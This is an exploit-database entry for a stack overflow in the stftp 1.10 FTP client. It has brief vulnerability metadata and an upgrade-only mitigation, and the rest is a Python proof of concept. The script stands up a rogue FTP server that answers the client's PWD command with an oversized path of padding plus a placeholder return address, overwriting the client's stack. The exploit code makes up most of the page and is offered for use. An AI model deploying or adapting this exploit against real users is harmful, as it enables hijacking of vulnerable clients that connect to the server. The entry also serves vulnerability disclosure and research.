stftp - exploit.company

vendor:

stftp

by:

sqlevil

7,5

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: stftp

Affected Version From: 1.10

Affected Version To: 1.10

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: OpenSuSE 11.1 x64

2020

stftp <= 1.10 (PWD Response Stack Overflow) PoC

This PoC exploits a stack overflow vulnerability in stftp <= 1.10. The vulnerability is triggered when a maliciously crafted PWD command is sent to the server, which causes a stack overflow. This PoC was tested on OpenSuSE 11.1 x64.

Mitigation:

Upgrade to the latest version of stftp.

Source

Exploit-DB raw data:

#!/usr/bin/python
# stftp <= 1.10 (PWD Response Stack Overflow) PoC
# Tested on: OpenSuSE 11.1 x64
# Coding: sqlevil - sqlevil@hotmail.com
# Viva Muslam Al-Barrak

from socket import *
class tcp:   
    def __init__(self):
        self.s = socket(AF_INET, SOCK_STREAM)
        self.s.bind(("0.0.0.0",21))
    
    def getnext(self):
        print ("Listening for connection ...\n")
        self.s.listen(1)
        c,  addr = self.s.accept()
        print ("client is nOw cOnnected\n")
        return c
    def close(self):
        self.s.close();

class ftp:
    def exCommand(self, command):
        if (len(command)<80):
            print("S -> C: " + command)
        else:
            print("S -> C: " + command[0:80] + " ...")
        self.s.send(command+'\r\n')

    def getCommand(self, size=1024):
        ret = self.s.recv(size);
        if (len(ret)<80):
            print ("C -> S: " +ret)
        else:
            print ("C -> S: " +ret[0:80] + " ...")
        return ret
      
    def __init__(self,  c):
        self.s=c
        
    def Banner(self,  str="Hi There"):
        self.exCommand( "220 %s" % str)
    def Auth(self, str1="pwd please",  str2="OK"):
        self.getCommand()
        self.exCommand( "331 %s" % str1)
        self.getCommand()
        self.exCommand( "230 %s" % str2)
        
    def PWD(self,  path='/',  str='"%s" is current directory.'):
        self.getCommand()
        self.exCommand( '257 %s' % str % path)
        
    def Reject(self):
        self.getCommand()
        self.exCommand( "230 ERR Type set to I.")
    def SYST(self):
        self.getCommand()
        self.exCommand( "215 UNIX Type: L8")
    def PORT(self):
        self.getCommand()
        self.exCommand( "200 PORT command successful.")
        
    def CWD(self):
        self.getCommand()
        self.exCommand( "250 CWD command successful.")
    def PASIV(self):
        self.getCommand()
        self.exCommand( "227 Entering Passive Mode (174,142,51,122,17,214).")
    def stftp(self):
        # TODO: Enter yOur desire address here
        retadd='abcdefghi'
        self.Banner()
        self.Auth()
        # This custom string is adjusted for x64 architeture
        self.PWD('x'*144+retadd)
        self.getCommand()
t = tcp()
try:
    f=ftp(t.getnext())
    f.stftp()
    
except: pass
finally:
    t.close()
    print "by3 <<<"

# milw0rm.com [2009-07-27]